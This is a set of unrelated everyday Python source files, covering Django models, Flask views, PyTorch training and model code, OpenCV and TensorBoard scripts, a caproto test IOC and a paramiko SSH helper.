('haghighiSellVolume', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('hoghooghiSellVolume', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('haghighiBuyCount', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('hoghooghiBuyCount', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('haghighiSellCount', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('hoghooghiSellCount', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('symbol_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.symbols')),
],
),
migrations.CreateModel(
name='BuySell',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateTimeField()),
('buyCount', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('buyVolue', models.DecimalField(decimal_places=1, default=0, max_digits=8)),
('buyPrice', models.DecimalField(decimal_places=1, default=0, max_digits=8)),
('sellCount', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('sellVolue', models.DecimalField(decimal_places=1, default=0, max_digits=8)),
('sellPrice', models.DecimalField(decimal_places=1, default=0, max_digits=8)),
('symbol_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.symbols')),
],
),
]
|
# Write a python function to generate
# and return the list of all possible sentences created from the given lists of Subject, Verb and Object.
# Note: The sentence should contain only one subject, verb and object each.
# Sample Input Expected Output
# subjects=["I", "You"]
# verbs=["Play", "Love"]
# objects=["Hockey","Football"]
# I Play Hockey
# I Play Football
# I Love Hockey
# I Love Football
# You Play Hockey
# You Play Football
# You Love Hockey
# You Love Football
#PF-Prac-12
def generate_sentences(subjects, verbs, objects):
#start writing your code here
sentence_list = []
for i in subjects:
for j in verbs:
for k in objects:
sentence_list.append(i+" "+j+" "+k)
return sentence_list
subjects = ["I", "You"]
verbs = ["love", "play"]
objects = ["Hockey", "Football"]
print(generate_sentences(subjects, verbs, objects))
|
#!/usr/bin/env python3.5
# -*- coding: utf-8 -*-
import sys
from PyQt5.QtCore import QUrl
from PyQt5.QtWidgets import QApplication
from PyQt5.QtQml import QQmlApplicationEngine
def main():
app = QApplication(sys.argv)
engine = QQmlApplicationEngine()
engine.setOfflineStoragePath("./Databases/")
engine.load(QUrl("./qml/Window.qml"))
app.exec_()
if __name__ == "__main__":
main()
|
from flask import render_template, redirect, url_for, abort, flash, request, \
current_app, make_response, abort
from flask.ext.login import login_required, current_user
from flask.ext.sqlalchemy import get_debug_queries
from app.decorators import admin_required
from . import main
from .forms import EditProfileForm, EditProfileAdminForm, NewModuleForm
from .. import db
from ..models import Permission, User, Role, DataJointModule
@main.after_app_request
def after_request(response):
for query in get_debug_queries():
if query.duration >= current_app.config['ROWBOT_SLOW_DB_QUERY_TIME']:
current_app.logger.warning(
'Slow query: %s\nParameters: %s\nDuration: %fs\nContext: %s\n'
% (query.statement, query.parameters, query.duration,
query.context))
return response
@main.route('/', methods=['GET', 'POST'])
def index():
page = request.args.get('page', 1, type=int)
return render_template('index.html', user=current_user)
@main.route('/user/<username>')
@login_required
def user(username):
user = User.query.filter_by(username=username).first_or_404()
return render_template('user.html', user=user)
@main.route('/edit-profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
form = EditProfileForm()
if form.validate_on_submit():
current_user.name = form.name.data
db.session.add(current_user)
flash('Your profile has been updated.')
return redirect(url_for('.user', username=current_user.username))
form.name.data = current_user.name
return render_template('edit_profile.html', form=form)
@main.route('/edit-profile/<username>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_profile_admin(username):
user = User.query.filter_by(username=username).first_or_404()
form = EditProfileAdminForm(user=user)
if form.validate_on_submit():
user.email = form.email.data
user.username = form.username.data
user.confirmed = form.confirmed.data
user.role = Role.query.get(form.role.data)
user.name = form.name.data
db.session.add(user)
flash('The profile has been updated.')
return redirect(url_for('.user', username=user.username))
form.email.data = user.email
form.username.data = user.username
form.confirmed.data = user.confirmed
form.role.data = user.role_id
form.name.data = user.name
return render_template('edit_profile.html', form=form, user=user)
@main.route('/modules/')
@login_required
def modules():
return render_template('modules.html', modules=DataJointModule.query.all())
@main.route('/modules/add/', methods=['GET', 'POST'])
@login_required
@admin_required
def add_module():
form = NewModuleForm()
if form.validate_on_submit():
DataJointModule.add_module(mod=form.modname.data)
flash('Module {0} has been added.'.format(form.modname.data))
return redirect(url_for('.modules'))
return render_template('add_module.html',form=form)
@main.route('/modules/remove/<modname>')
@login_required
@admin_required
def remove_module(modname):
DataJointModule.remove_module(mod=modname)
flash('Module {0} has been removed.'.format(modname))
return redirect(url_for('.modules'))
|
from Models import Encoder
from data_loader import cropus
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import sys
import torch.optim as optim
import os
from visdom import Visdom
def get_dev_loss(model,mycropus,dev_data,criterion):
#计算开发测试节集损失
dev_loss_list=[]
dev_acc_list=[]
for batch_data in mycropus.batch_iterator(dev_data):
inp,pos,tag=[x[0] for x in batch_data],[x[1] for x in batch_data],[x[2] for x in batch_data]
inp=Variable(torch.from_numpy(np.array(inp)).cuda())
pos=Variable(torch.from_numpy(np.array(pos)).cuda())
tag=Variable(torch.LongTensor(torch.from_numpy(np.array(tag)))).cuda()
preds= model(inp, pos)
loss = criterion(preds,tag)
_,pred_idx=torch.max(preds,1)
dev_acc_list.append((sum(pred_idx.cpu().data.numpy()==tag.cpu().data.numpy())*1./tag.size(0)))
dev_loss_list.append(loss.cpu().data.numpy())
print("mean_dev_loss:{},mean_dev_acc:{}".format(np.mean(dev_loss_list),np.mean(dev_acc_list)))
return np.mean(dev_acc_list),np.mean(dev_loss_list)
def train():
viz = Visdom()
line = viz.line(np.arange(2))
mycropus=cropus()
n_class=mycropus.n_class
if os.path.isfile('save/model.pt'):
model=torch.load('save/model.pt')
else:
model=Encoder(n_src_vocab=len(mycropus.token2idx),n_max_seq=mycropus.max_len).cuda()
criterion = nn.CrossEntropyLoss().cuda()
optimizer=optim.Adam(model.parameters(),lr=0.0005)
train_loss_p=[]
train_acc_p=[]
dev_loss_p=[]
dev_acc_p=[]
step_p=[]
for epoch in range(100):
step=0
tr_loss_list=[]
tr_acc_list=[]
best_dev_acc=0.3
for batch_data in mycropus.batch_iterator(mycropus.train_data):
inp,pos,tag=[x[0] for x in batch_data],[x[1] for x in batch_data],[x[2] for x in batch_data]
inp=Variable(torch.from_numpy(np.array(inp)).cuda())
pos=Variable(torch.from_numpy(np.array(pos)).cuda())
tag=Variable(torch.LongTensor(torch.from_numpy(np.array(tag)))).cuda()
preds= model(inp, pos)
loss = criterion(preds,tag)
_,pred_idx=torch.max(preds,1)
tr_acc_list.append((sum(pred_idx.cpu().data.numpy()==tag.cpu().data.numpy())*1./tag.size(0)))
tr_loss_list.append(loss.cpu().data.numpy())
optimizer.zero_grad()
loss.backward()
# 剪裁参数梯度
nn.utils.clip_grad_norm(model.parameters(), 1, norm_type=2)
optimizer.step()
step=step+1
if step%100==0:
print("epoch:{},step:{},mean_loss:{},mean_acc:{}".format(epoch,step,np.mean(tr_loss_list),np.mean(tr_acc_list)))
dev_acc,dev_loss=get_dev_loss(model,mycropus,mycropus.dev_data,criterion)
if best_dev_acc<dev_acc:
torch.save(model,'save/model.pt')
best_dev_acc=dev_acc
print("-----------")
train_loss_p.append(np.mean(tr_loss_list))
train_acc_p.append(np.mean(tr_acc_list))
dev_loss_p.append(np.mean(dev_loss))
dev_acc_p.append(np.mean(dev_acc))
step_p.append(step+epoch*mycropus.nums_batch)
viz.line(
X=np.column_stack((np.array(step_p), np.array(step_p),np.array(step_p), np.array(step_p))),
Y=np.column_stack((np.array(train_loss_p),np.array(train_acc_p),np.array(dev_loss_p), np.array(dev_acc_p))),
win=line,
opts=dict(legend=["Train_mean_loss", "Train_acc","Eval_mean_loss", "Eval_acc"]))
tr_loss_list=[]
tr_acc_list=[]
def preds():
mycropus=cropus()
if os.path.isfile('save/model.pt'):
model=torch.load('save/model.pt')
else:
print("no model file")
sys.exit(0)
# 开始生产测试结果,
print("test data size :{},batch nums:{}".format(len(mycropus.test_data),len(mycropus.test_data)/mycropus.batch_size))
with open("save/results.csv",'w') as f:
step=0
for batch_data in mycropus.batch_iterator(mycropus.test_data):
# 对测试集来说,最后一个文本id
inp,pos,id=[x[0] for x in batch_data],[x[1] for x in batch_data],[x[2] for x in batch_data]
inp=Variable(torch.from_numpy(np.array(inp)).cuda())
pos=Variable(torch.from_numpy(np.array(pos)).cuda())
preds= model(inp, pos)
_,pred_idx=torch.max(preds,1)
output=pred_idx.cpu().data.numpy()
step=step+1
if step%100==0:
print("step:{}".format(step))
for id,label in zip(id,output):
f.write(str(id)+","+str(label+1)+"\n")
if __name__ == '__main__':
preds()
|
from django.contrib import admin
from .models import suggestion
# Register your models here.
@admin.register(suggestion)
class suggestAdmin(admin.ModelAdmin):
list_display = ['name1','others']
|
INF = 1000
def getDigits(n):
return set(map(int, list(str(n))))
T = input()
for t in range(1, T+1):
N = input()
if N == 0:
res = "INSOMNIA"
else:
digits = set()
for i in range(1, INF):
digits.update(getDigits(N*i))
if len(digits) == 10:
res = N*i
break
print "Case #%d: %s" % (t, res)
|
import os
import tensorflow as tf
import numpy as np
from tensorflow.contrib.tensorboard.plugins import projector
import gensim
LOGDIR = 'log'
N = 3000
D = 300
# load model
word2vec = gensim.models.KeyedVectors.load_word2vec_format('filtered.bin', binary=True)
vocab = list(word2vec.vocab.keys())
# create a list of vectors
embedding = np.empty((N, D), dtype=np.float32)
for i, word in enumerate(word2vec.index2word[: N]):
embedding[i] = word2vec[word]
# setup a TensorFlow session
tf.reset_default_graph()
sess = tf.InteractiveSession()
X = tf.Variable([0.0], name='embedding')
place = tf.placeholder(tf.float32, shape=embedding.shape)
set_x = tf.assign(X, place, validate_shape=False)
sess.run(tf.global_variables_initializer())
sess.run(set_x, feed_dict={place: embedding})
# write labels
with open('log/metadata.tsv', 'w') as f:
for word in vocab[:N]:
f.write(word + '\n')
# create a TensorFlow summary writer
summary_writer = tf.summary.FileWriter(LOGDIR, sess.graph)
config = projector.ProjectorConfig()
embedding_conf = config.embeddings.add()
embedding_conf.tensor_name = X.name
embedding_conf.metadata_path = os.path.join(LOGDIR, 'metadata.tsv')
projector.visualize_embeddings(summary_writer, config)
# save the model
saver = tf.train.Saver()
saver.save(sess, os.path.join('log', "model.ckpt"))
#chekiranje za github
|
import array
import matplotlib.pyplot as plt
import skimage.transform as transform
import numpy as np
import scipy.integrate as spi
import scipy.optimize as sopt
import warnings
import scipy.interpolate as sinterp
def get_vanhateren(filename, src_dir):
with open(filename, 'rb') as handle:
s = handle.read()
arr = array.array('H', s)
arr.byteswap()
return np.array(arr, dtype='uint16').reshape(1024, 1536)
def convert_tmin_tmax_framerate_to_trange(t_min,t_max,frame_rate):
duration = t_max-t_min
number_of_frames = duration*frame_rate # Assumes t_min/t_max in same time units as frame_rate
dt= 1./frame_rate
return t_min+np.arange(number_of_frames+1)*dt
def get_rotation_matrix(rotation, shape):
'''Angle in degrees'''
shift_y, shift_x = np.array(shape) / 2.
tf_rotate = transform.SimilarityTransform(rotation=np.deg2rad(rotation))
tf_shift = transform.SimilarityTransform(translation=[-shift_x, -shift_y])
tf_shift_inv = transform.SimilarityTransform(translation=[shift_x, shift_y])
return (tf_shift + (tf_rotate + tf_shift_inv))
def get_translation_matrix(translation):
shift_x, shift_y = translation
tf_shift = transform.SimilarityTransform(translation=[-shift_x, shift_y])
return tf_shift
def get_scale_matrix(scale, shape):
shift_y, shift_x = np.array(shape) / 2.
tf_rotate = transform.SimilarityTransform(scale=(1./scale[0], 1./scale[1]))
tf_shift = transform.SimilarityTransform(translation=[-shift_x, -shift_y])
tf_shift_inv = transform.SimilarityTransform(translation=[shift_x, shift_y])
return tf_shift + (tf_rotate + tf_shift_inv)
def apply_transformation_matrix(image, matrix):
return transform.warp(image, matrix)
def get_convolution_ind(curr_fi, flipped_t_inds, kernel, data):
flipped_and_offset_t_inds = flipped_t_inds + curr_fi
if np.all( flipped_and_offset_t_inds >= 0):
# No negative entries; still might be over the end though:
try:
return np.dot(data[flipped_and_offset_t_inds], kernel)
except IndexError:
# Requested some indices out of range of data:
indices_within_range = np.where(flipped_and_offset_t_inds < len(data))
valid_t_inds = flipped_and_offset_t_inds[indices_within_range]
valid_kernel = kernel[indices_within_range]
return np.dot(data[valid_t_inds], valid_kernel)
else:
# # Some negative entries:
# if np.all( flipped_and_offset_t_inds < 0):
#
# # All are negative:
# return 0
#
# else:
# Only some are negative, so restrict:
indices_within_range = np.where(flipped_and_offset_t_inds >= 0)
valid_t_inds = flipped_and_offset_t_inds[indices_within_range]
valid_kernel = kernel[indices_within_range]
return np.dot(data[valid_t_inds], valid_kernel)
def get_convolution(t, frame_rate, flipped_t_inds, kernel, data):
# Get frame indices:
fi = frame_rate*float(t)
fim = int(np.floor(fi))
fiM = int(np.ceil(fi))
if fim != fiM:
# Linear interpolation:
sm = get_convolution_ind(fim, flipped_t_inds, kernel, data)
sM = get_convolution_ind(fiM, flipped_t_inds, kernel, data)
return sm*(1-(fi-fim)) + sM*(fi-fim)
else:
# Requested time is exactly one piece of data:
return get_convolution_ind(fim, flipped_t_inds, kernel, data)
if __name__ == "__main__":
pass
# print generate_poisson([0,1,2,3],[.5,1,2,3])
# test_generate_poisson_function()
# image = np.zeros((101,151))
# image[48:52+1]=1
#
# mr = get_rotation_matrix(30, image.shape)
# mt = get_translation_matrix((20,0))
# ms = get_scale_matrix((.5,1),image.shape)
#
# m = mr
#
# fig, ax = plt.subplots(2,1)
# ax[0].imshow(image)
# ax[1].imshow(apply_transformation_matrix(image, m))
# plt.show()
|
import cv2
camera = cv2.VideoCapture(0)
prev_frame = None
while camera.isOpened():
success, frame = camera.read()
if not success:
break
frame = cv2.medianBlur(frame, 5)
if prev_frame is not None:
mask = cv2.absdiff(frame, prev_frame)
_, mask = cv2.threshold(mask, 50, 255, cv2.THRESH_BINARY)
cv2.imshow("mask", mask)
else:
prev_frame = frame
cv2.imshow("prev", prev_frame)
cv2.imshow("frame", frame)
key_code = cv2.waitKey(1)
if key_code in [ord('q'), 27]:
break
camera.release()
cv2.destroyAllWindows()
|
# Copyright (c) 2017-present, yszhu.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""darknet19 from https://pjreddie.com/darknet/imagenet/"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
import torch.nn as nn
import torch.nn.functional as F
from maskrcnn_benchmark.layers import FrozenBatchNorm2d
from maskrcnn_benchmark.utils.registry import Registry
_NORMALIZATION_MODULES = Registry({
"FrozenBatchNorm2d": FrozenBatchNorm2d,
"BatchNorm2d": nn.BatchNorm2d,
})
def add_stage(
n,
dim_in,
dim_out1,
dim_inner,
normalization
):
"""Add a ResNet stage to the model by stacking n residual blocks."""
blocks = []
for i in range(n):
blocks.append(Xception_block(
dim_in,
dim_out1,
dim_inner,
normalization = normalization
))
dim_in = dim_in + dim_inner + dim_inner
return nn.Sequential(*blocks)
class Xception_block(nn.Module):
def __init__(self,
dim_in,
dim_out1,
dim_inner,
normalization = 'FrozenBatchNorm2d'
):
super(Xception_block, self).__init__()
norm_func = _NORMALIZATION_MODULES[normalization]
self.branch1a = nn.Conv2d(dim_in, dim_out1, kernel_size=1, padding=0, stride=1, bias=False)
self.branch1a_bn = norm_func(dim_out1)
self.branch1b = nn.Conv2d(dim_out1, dim_inner, kernel_size=3, padding=1, stride=1, bias=False)
self.branch1b_bn = norm_func(dim_inner)
#
self.branch2a = nn.Conv2d(dim_in, dim_out1, kernel_size=1, padding=0, stride=1, bias=False)
self.branch2a_bn = norm_func(dim_out1)
self.branch2b = nn.Conv2d(dim_out1, dim_inner, kernel_size=3, padding=1, stride=1, bias=False)
self.branch2b_bn = norm_func(dim_inner)
self.branch2c = nn.Conv2d(dim_inner, dim_inner, kernel_size=3, padding=1, stride=1, bias=False)
self.branch2c_bn = norm_func(dim_inner)
def forward(self, x):
b1 = self.branch1a(x)
b1 = self.branch1a_bn(b1)
b1 = F.relu_(b1)
b1 = self.branch1b(b1)
b1 = self.branch1b_bn(b1)
b1 = F.relu_(b1)
b2 = self.branch2a(x)
b2 = self.branch2a_bn(b2)
b2 = F.relu_(b2)
b2 = self.branch2b(b2)
b2 = self.branch2b_bn(b2)
b2 = F.relu_(b2)
b2 = self.branch2c(b2)
b2 = self.branch2c_bn(b2)
b2 = F.relu_(b2)
return torch.cat([x, b1, b2], dim = 1)
#Xception_iva
#['res_stage4_tb_bn', 'res_stage3_tb_bn', 'res_stage2_tb_bn', 'res_stage1_tb_bn']
#[1. / 32., 1. / 16., 1. / 8., 1. / 4.]
class Xception_iva(nn.Module):
def __init__(self, block_counts = (1, 2, 3, 3), normalization = "FrozenBatchNorm2d"):
super(Xception_iva, self).__init__()
self.norm_func = _NORMALIZATION_MODULES[normalization]
self.stem1 = nn.Conv2d(3, 16, kernel_size=3, padding=1, stride=2, bias=False)
self.res_stem1_bn = self.norm_func(16)
self.stem2a = nn.Conv2d(16, 16, kernel_size=1, padding=0, stride=1, bias=False)
self.res_stem2a_bn = self.norm_func(16)
self.stem2b = nn.Conv2d(16, 16, kernel_size=3, padding=1, stride=2, bias=False)
self.res_stem2b_bn = self.norm_func(16)
self.stem3 = nn.Conv2d(32, 16, kernel_size=1, padding=0, stride=1, bias=False)
self.res_stem3_bn = self.norm_func(16)
(n1, n2, n3, n4) = block_counts[:4]
dim_inner = 16
self.stage1 = add_stage(n1, 16, 8, 8, normalization = normalization)
self.stage1_tb = nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1, bias=False)
self.res_stage1_tb_bn = self.norm_func(32)
self.stage2 = add_stage(n2, 32, 16, dim_inner, normalization = normalization)
self.stage2_tb = nn.Conv2d(96, 96, kernel_size=1, padding=0, stride=1, bias=False)
self.res_stage2_tb_bn = self.norm_func(96)
self.stage3 = add_stage(n3, 96, 32, dim_inner, normalization = normalization)
self.stage3_tb = nn.Conv2d(192, 192, kernel_size=1, padding=0, stride=1, bias=False)
self.res_stage3_tb_bn = self.norm_func(192)
self.stage4 = add_stage(n4, 192, 64, dim_inner, normalization = normalization)
self.stage4_tb = nn.Conv2d(288, 288, kernel_size=1, padding=0, stride=1, bias=False)
self.res_stage4_tb_bn = self.norm_func(288)
def forward(self, x):
x = self.stem1(x)
x = self.res_stem1_bn(x)
x = F.relu_(x)
p2 = self.stem2a(x)
p2 = self.res_stem2a_bn(p2)
p2 = F.relu_(p2)
p2 = self.stem2b(p2)
p2 = self.res_stem2b_bn(p2)
p2 = F.relu_(p2)
x = F.max_pool2d(x, kernel_size=2, stride=2)
x = torch.cat([x, p2], dim=1)
x = self.stem3(x)
x = self.res_stem3_bn(x)
x = F.relu_(x)
f1 = self.stage1(x)
f1 = self.stage1_tb(f1)
f1 = self.res_stage1_tb_bn(f1)
f1 = F.relu_(f1)
f2 = F.avg_pool2d(f1, kernel_size=2, padding=0, stride=2)
f2 = self.stage2(f2)
f2 = self.stage2_tb(f2)
f2 = self.res_stage2_tb_bn(f2)
f2 = F.relu_(f2)
f3 = F.avg_pool2d(f2, kernel_size=2, padding=0, stride=2)
f3 = self.stage3(f3)
f3 = self.stage3_tb(f3)
f3 = self.res_stage3_tb_bn(f3)
f3 = F.relu_(f3)
f4 = F.avg_pool2d(f3, kernel_size=2, padding=0, stride=2)
f4 = self.stage4(f4)
f4 = self.stage4_tb(f4)
f4 = self.res_stage4_tb_bn(f4)
f4 = F.relu_(f4)
return [f1, f2, f3, f4] |
import random
import os
if __name__ == "__main__":
# os.rename('./data/plaws.csv', './data/plaws_full.csv')
with open("./data/plaws.csv", "rb") as source:
lines = [line for line in source]
random_choice = random.sample(lines, 200)
source.close()
with open("./data/plaws.csv", "wb") as sink:
sink.write("".join(random_choice))
|
#!/usr/bin/env python3
from caproto import ChannelType
from caproto.server import PVGroup, SubGroup, ioc_arg_parser, pvproperty, run
class EpicsScalerGroup(PVGroup):
count = pvproperty(name=".CNT", dtype=int)
count_mode = pvproperty(
value="OneShot",
name=".CONT",
dtype=ChannelType.ENUM,
enum_strings=["OneShot", "AutoCount"],
)
delay = pvproperty(name=".DLY", dtype=float)
auto_count_delay = pvproperty(name=".DLY1", dtype=float)
class ChannelsGroup(PVGroup):
chan1 = pvproperty(value=0, name=".S1", dtype=int, read_only=True)
chan2 = pvproperty(value=0, name=".S2", dtype=int, read_only=True)
chan3 = pvproperty(value=0, name=".S3", dtype=int, read_only=True)
chan4 = pvproperty(value=0, name=".S4", dtype=int, read_only=True)
chan5 = pvproperty(value=0, name=".S5", dtype=int, read_only=True)
chan6 = pvproperty(value=0, name=".S6", dtype=int, read_only=True)
chan7 = pvproperty(value=0, name=".S7", dtype=int, read_only=True)
chan8 = pvproperty(value=0, name=".S8", dtype=int, read_only=True)
chan9 = pvproperty(value=0, name=".S9", dtype=int, read_only=True)
chan10 = pvproperty(value=0, name=".S10", dtype=int, read_only=True)
chan11 = pvproperty(value=0, name=".S11", dtype=int, read_only=True)
chan12 = pvproperty(value=0, name=".S12", dtype=int, read_only=True)
chan13 = pvproperty(value=0, name=".S13", dtype=int, read_only=True)
chan14 = pvproperty(value=0, name=".S14", dtype=int, read_only=True)
chan15 = pvproperty(value=0, name=".S15", dtype=int, read_only=True)
chan16 = pvproperty(value=0, name=".S16", dtype=int, read_only=True)
chan17 = pvproperty(value=0, name=".S17", dtype=int, read_only=True)
chan18 = pvproperty(value=0, name=".S18", dtype=int, read_only=True)
chan19 = pvproperty(value=0, name=".S19", dtype=int, read_only=True)
chan20 = pvproperty(value=0, name=".S20", dtype=int, read_only=True)
chan21 = pvproperty(value=0, name=".S21", dtype=int, read_only=True)
chan22 = pvproperty(value=0, name=".S22", dtype=int, read_only=True)
chan23 = pvproperty(value=0, name=".S23", dtype=int, read_only=True)
chan24 = pvproperty(value=0, name=".S24", dtype=int, read_only=True)
chan25 = pvproperty(value=0, name=".S25", dtype=int, read_only=True)
chan26 = pvproperty(value=0, name=".S26", dtype=int, read_only=True)
chan27 = pvproperty(value=0, name=".S27", dtype=int, read_only=True)
chan28 = pvproperty(value=0, name=".S28", dtype=int, read_only=True)
chan29 = pvproperty(value=0, name=".S29", dtype=int, read_only=True)
chan30 = pvproperty(value=0, name=".S30", dtype=int, read_only=True)
chan31 = pvproperty(value=0, name=".S31", dtype=int, read_only=True)
chan32 = pvproperty(value=0, name=".S32", dtype=int, read_only=True)
channels = SubGroup(ChannelsGroup, prefix="")
class NamesGroup(PVGroup):
name1 = pvproperty(value="name", name=".NM1", dtype=ChannelType.STRING)
name2 = pvproperty(value="name", name=".NM2", dtype=ChannelType.STRING)
name3 = pvproperty(value="name", name=".NM3", dtype=ChannelType.STRING)
name4 = pvproperty(value="name", name=".NM4", dtype=ChannelType.STRING)
name5 = pvproperty(value="name", name=".NM5", dtype=ChannelType.STRING)
name6 = pvproperty(value="name", name=".NM6", dtype=ChannelType.STRING)
name7 = pvproperty(value="name", name=".NM7", dtype=ChannelType.STRING)
name8 = pvproperty(value="name", name=".NM8", dtype=ChannelType.STRING)
name9 = pvproperty(value="name", name=".NM9", dtype=ChannelType.STRING)
name10 = pvproperty(value="name", name=".NM10", dtype=ChannelType.STRING)
name11 = pvproperty(value="name", name=".NM11", dtype=ChannelType.STRING)
name12 = pvproperty(value="name", name=".NM12", dtype=ChannelType.STRING)
name13 = pvproperty(value="name", name=".NM13", dtype=ChannelType.STRING)
name14 = pvproperty(value="name", name=".NM14", dtype=ChannelType.STRING)
name15 = pvproperty(value="name", name=".NM15", dtype=ChannelType.STRING)
name16 = pvproperty(value="name", name=".NM16", dtype=ChannelType.STRING)
name17 = pvproperty(value="name", name=".NM17", dtype=ChannelType.STRING)
name18 = pvproperty(value="name", name=".NM18", dtype=ChannelType.STRING)
name19 = pvproperty(value="name", name=".NM19", dtype=ChannelType.STRING)
name20 = pvproperty(value="name", name=".NM20", dtype=ChannelType.STRING)
name21 = pvproperty(value="name", name=".NM21", dtype=ChannelType.STRING)
name22 = pvproperty(value="name", name=".NM22", dtype=ChannelType.STRING)
name23 = pvproperty(value="name", name=".NM23", dtype=ChannelType.STRING)
name24 = pvproperty(value="name", name=".NM24", dtype=ChannelType.STRING)
name25 = pvproperty(value="name", name=".NM25", dtype=ChannelType.STRING)
name26 = pvproperty(value="name", name=".NM26", dtype=ChannelType.STRING)
name27 = pvproperty(value="name", name=".NM27", dtype=ChannelType.STRING)
name28 = pvproperty(value="name", name=".NM28", dtype=ChannelType.STRING)
name29 = pvproperty(value="name", name=".NM29", dtype=ChannelType.STRING)
name30 = pvproperty(value="name", name=".NM30", dtype=ChannelType.STRING)
name31 = pvproperty(value="name", name=".NM31", dtype=ChannelType.STRING)
name32 = pvproperty(value="name", name=".NM32", dtype=ChannelType.STRING)
names = SubGroup(NamesGroup, prefix="")
time = pvproperty(name=".T", dtype=float)
freq = pvproperty(name=".FREQ", dtype=float)
preset_time = pvproperty(name=".TP", dtype=float)
auto_count_time = pvproperty(name=".TP1", dtype=float)
class PresetsGroup(PVGroup):
preset1 = pvproperty(name=".PR1", dtype=int)
preset2 = pvproperty(name=".PR2", dtype=int)
preset3 = pvproperty(name=".PR3", dtype=int)
preset4 = pvproperty(name=".PR4", dtype=int)
preset5 = pvproperty(name=".PR5", dtype=int)
preset6 = pvproperty(name=".PR6", dtype=int)
preset7 = pvproperty(name=".PR7", dtype=int)
preset8 = pvproperty(name=".PR8", dtype=int)
preset9 = pvproperty(name=".PR9", dtype=int)
preset10 = pvproperty(name=".PR10", dtype=int)
preset11 = pvproperty(name=".PR11", dtype=int)
preset12 = pvproperty(name=".PR12", dtype=int)
preset13 = pvproperty(name=".PR13", dtype=int)
preset14 = pvproperty(name=".PR14", dtype=int)
preset15 = pvproperty(name=".PR15", dtype=int)
preset16 = pvproperty(name=".PR16", dtype=int)
preset17 = pvproperty(name=".PR17", dtype=int)
preset18 = pvproperty(name=".PR18", dtype=int)
preset19 = pvproperty(name=".PR19", dtype=int)
preset20 = pvproperty(name=".PR20", dtype=int)
preset21 = pvproperty(name=".PR21", dtype=int)
preset22 = pvproperty(name=".PR22", dtype=int)
preset23 = pvproperty(name=".PR23", dtype=int)
preset24 = pvproperty(name=".PR24", dtype=int)
preset25 = pvproperty(name=".PR25", dtype=int)
preset26 = pvproperty(name=".PR26", dtype=int)
preset27 = pvproperty(name=".PR27", dtype=int)
preset28 = pvproperty(name=".PR28", dtype=int)
preset29 = pvproperty(name=".PR29", dtype=int)
preset30 = pvproperty(name=".PR30", dtype=int)
preset31 = pvproperty(name=".PR31", dtype=int)
preset32 = pvproperty(name=".PR32", dtype=int)
presets = SubGroup(PresetsGroup, prefix="")
class GatesGroup(PVGroup):
gate1 = pvproperty(name=".G1", dtype=int)
gate2 = pvproperty(name=".G2", dtype=int)
gate3 = pvproperty(name=".G3", dtype=int)
gate4 = pvproperty(name=".G4", dtype=int)
gate5 = pvproperty(name=".G5", dtype=int)
gate6 = pvproperty(name=".G6", dtype=int)
gate7 = pvproperty(name=".G7", dtype=int)
gate8 = pvproperty(name=".G8", dtype=int)
gate9 = pvproperty(name=".G9", dtype=int)
gate10 = pvproperty(name=".G10", dtype=int)
gate11 = pvproperty(name=".G11", dtype=int)
gate12 = pvproperty(name=".G12", dtype=int)
gate13 = pvproperty(name=".G13", dtype=int)
gate14 = pvproperty(name=".G14", dtype=int)
gate15 = pvproperty(name=".G15", dtype=int)
gate16 = pvproperty(name=".G16", dtype=int)
gate17 = pvproperty(name=".G17", dtype=int)
gate18 = pvproperty(name=".G18", dtype=int)
gate19 = pvproperty(name=".G19", dtype=int)
gate20 = pvproperty(name=".G20", dtype=int)
gate21 = pvproperty(name=".G21", dtype=int)
gate22 = pvproperty(name=".G22", dtype=int)
gate23 = pvproperty(name=".G23", dtype=int)
gate24 = pvproperty(name=".G24", dtype=int)
gate25 = pvproperty(name=".G25", dtype=int)
gate26 = pvproperty(name=".G26", dtype=int)
gate27 = pvproperty(name=".G27", dtype=int)
gate28 = pvproperty(name=".G28", dtype=int)
gate29 = pvproperty(name=".G29", dtype=int)
gate30 = pvproperty(name=".G30", dtype=int)
gate31 = pvproperty(name=".G31", dtype=int)
gate32 = pvproperty(name=".G32", dtype=int)
gates = SubGroup(GatesGroup, prefix="")
update_rate = pvproperty(name=".RATE", dtype=int)
auto_count_update_rate = pvproperty(name=".RAT1", dtype=int)
egu = pvproperty(value="EGU", name=".EGU", dtype=ChannelType.STRING)
if __name__ == "__main__":
ioc_options, run_options = ioc_arg_parser(
default_prefix="scaler_tests:", desc="ophyd.tests.test_scaler test IOC"
)
ioc = EpicsScalerGroup(**ioc_options)
run(ioc.pvdb, **run_options)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Friendly Python SSH2 interface."""
import os
import sys
import tempfile
import paramiko
import traceback
class Connection(object):
"""Connects and logs into the specified hostname.
Arguments that are not given are guessed from the environment."""
def __init__(
self,
host,
username=None,
password=None,
port=22,
time=None,
):
if not username:
username = os.environ['LOGNAME']
# templog = tempfile.mkstemp('.txt', 'ssh-')[1] #get the temp filename and log into temp file
# paramiko.util.log_to_file(templog) #send the logs to logfile
self._client = paramiko.SSHClient()
self._client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
connection = self._client.connect(host, port, username,
password, timeout=time)
self._transport = self._client.get_transport()
self._transport.set_keepalive(3)
